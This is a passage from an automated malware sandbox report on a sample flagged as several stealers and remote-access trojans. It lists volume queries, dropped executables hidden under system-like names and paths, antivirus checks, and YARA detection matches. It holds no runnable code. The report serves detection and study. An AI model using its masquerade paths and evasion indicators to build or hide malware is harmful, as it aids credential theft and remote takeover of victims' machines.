                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                                    Source: C:\Users\user\AppData\Roaming\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Update.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Roaming\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Update.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\cnvwov.EXEQueries volume information: C:\Users\user\AppData\Local\Temp\cnvwov.EXE VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\AppData\Roaming\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Update.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Roaming\Update.exeQueries volume information: C:\Users\user\AppData\Roaming\Update.exe VolumeInformation
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeQueries volume information: C:\agentwebreviewDhcp\portBrowserweb.exe VolumeInformation
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                    Source: C:\agentwebreviewDhcp\portBrowserweb.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                    Source: C:\Program Files\Windows Mail\System.exeQueries volume information: C:\Program Files\Windows Mail\System.exe VolumeInformation
                                    Source: C:\Program Files\Windows Mail\System.exeQueries volume information: C:\Program Files\Windows Mail\System.exe VolumeInformation
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C7DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,24_2_00C7DF1E
                                    Source: C:\Users\user\AppData\Local\Temp\rqbprm.exeCode function: 24_2_00C6B146 GetVersionExW,24_2_00C6B146
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                    Source: HaLCYOFjMN.exe, 00000005.00000002.2751379644.000000001B3F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ndows Defender\MsMpeng.exe
                                    Source: HaLCYOFjMN.exe, 00000005.00000002.2757698692.000000001C0C0000.00000004.00000020.00020000.00000000.sdmp, HaLCYOFjMN.exe, 00000005.00000002.2751379644.000000001B447000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                                    Source: C:\Users\user\Desktop\HaLCYOFjMN.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                                    Stealing of Sensitive Information

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000021.00000002.2642036068.0000000012B3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: portBrowserweb.exe PID: 7392, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: 24.3.rqbprm.exe.73bc6d7.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 24.3.rqbprm.exe.6aa46d7.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 24.3.rqbprm.exe.6aa46d7.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 33.0.portBrowserweb.exe.3e0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 24.3.rqbprm.exe.73bc6d7.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000021.00000000.2338852988.00000000003E2000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000018.00000003.2089903896.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000018.00000003.2090975716.000000000736E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\agentwebreviewDhcp\portBrowserweb.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Windows Mail\System.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\agentwebreviewDhcp\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\rqbprm.exe, type: DROPPED
                                    Yara detected RedLine Stealer
                                    Source: Yara matchFile source: Process Memory Space: cnvwov.EXE PID: 1860, type: MEMORYSTR
                                    Yara detected Telegram RAT
                                    Source: Yara matchFile source: HaLCYOFjMN.exe, type: SAMPLE
                                    Source: Yara matchFile source: 5.0.HaLCYOFjMN.exe.200000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: HaLCYOFjMN.exe PID: 720, type: MEMORYSTR
                                    Yara detected XWorm
                                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                                    Source: Yara matchFile source: HaLCYOFjMN.exe, type: SAMPLE
                                    Source: Yara matchFile source: 5.0.HaLCYOFjMN.exe.200000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000005.00000000.1275401663.0000000000202000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000002.2734936969.0000000002561000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000005.00000002.2734936969.00000000025BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: HaLCYOFjMN.exe PID: 720, type: MEMORYSTR
                                    Yara detected zgRAT
                                    Source: Yara matchFile source: 24.3.rqbprm.exe.73bc6d7.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 24.3.rqbprm.exe.6aa46d7.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 24.3.rqbprm.exe.6aa46d7.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 33.0.portBrowserweb.exe.3e0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 24.3.rqbprm.exe.73bc6d7.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\agentwebreviewDhcp\portBrowserweb.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Windows Mail\System.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\agentwebreviewDhcp\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\rqbprm.exe, type: DROPPED

                                    Remote Access Functionality

                                    barindex
                                    Yara detected DCRat
                                    Source: Yara matchFile source: 00000021.00000002.2642036068.0000000012B3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: portBrowserweb.exe PID: 7392, type: MEMORYSTR
                                    Yara detected PureLog Stealer
                                    Source: Yara matchFile source: 24.3.rqbprm.exe.73bc6d7.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 24.3.rqbprm.exe.6aa46d7.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 24.3.rqbprm.exe.6aa46d7.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 33.0.portBrowserweb.exe.3e0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 24.3.rqbprm.exe.73bc6d7.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000021.00000000.2338852988.00000000003E2000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000018.00000003.2089903896.0000000006A56000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000018.00000003.2090975716.000000000736E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Windows\SystemApps\Microsoft.Windows.AppResolverUX_cw5n1h2txyewy\pris\Idle.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\agentwebreviewDhcp\portBrowserweb.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files (x86)\Mozilla Maintenance Service\logs\ybWXCCKXKhIvlNpBF.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Program Files\Windows Mail\System.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\agentwebreviewDhcp\WmiPrvSE.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\rqbprm.exe, type: DROPPED
                                    Yara detected RedLine Stealer
                                    Source: Yara matchFile source: Process Memory Space: cnvwov.EXE PID: 1860, type: MEMORYSTR
                                    Yara detected Telegram RAT
                                    Source: Yara matchFile source: HaLCYOFjMN.exe, type: SAMPLE
                                    Source: Yara matchFile source: 5.0.HaLCYOFjMN.exe.200000.0.unpack, type: UNPACKEDPE
